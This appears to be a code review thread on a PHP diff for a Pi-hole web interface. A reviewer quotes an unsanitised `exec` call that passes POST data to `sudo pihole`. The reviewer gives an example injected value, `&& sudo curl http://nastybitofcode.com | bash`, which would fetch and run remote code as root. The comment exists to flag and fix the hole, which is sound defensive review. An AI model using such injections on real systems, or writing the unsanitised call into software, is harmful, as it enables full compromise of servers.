php/system.php

```diff
@@ -0,0 +1,52 @@
+<?php
+
+$PI_HOLE_DIR = "/etc/pihole";
+
+$ENABLE_STUBS = true;
+
+if ($ENABLE_STUBS) {
+    $PI_HOLE_DIR = "stubs";
+}
+
+function isUsingStubs() {
+    global $PI_HOLE_DIR;
+    return $PI_HOLE_DIR == "stubs";
+}
+
+function getFileList($type) {
+    global $PI_HOLE_DIR;
+    return file_get_contents($PI_HOLE_DIR . "/" . $type . "list.txt");
```

Comment:
@Mcat12 how do we feel about stuff like this as a security risk:

        echo exec("sudo pihole -b -q ${_POST['domain']}");

If I set POST domain to 
    && sudo curl http://nastybitofcode.com | bash
for example, would that run as sudo, is there any way we can escape this, maybe check the domain is valid?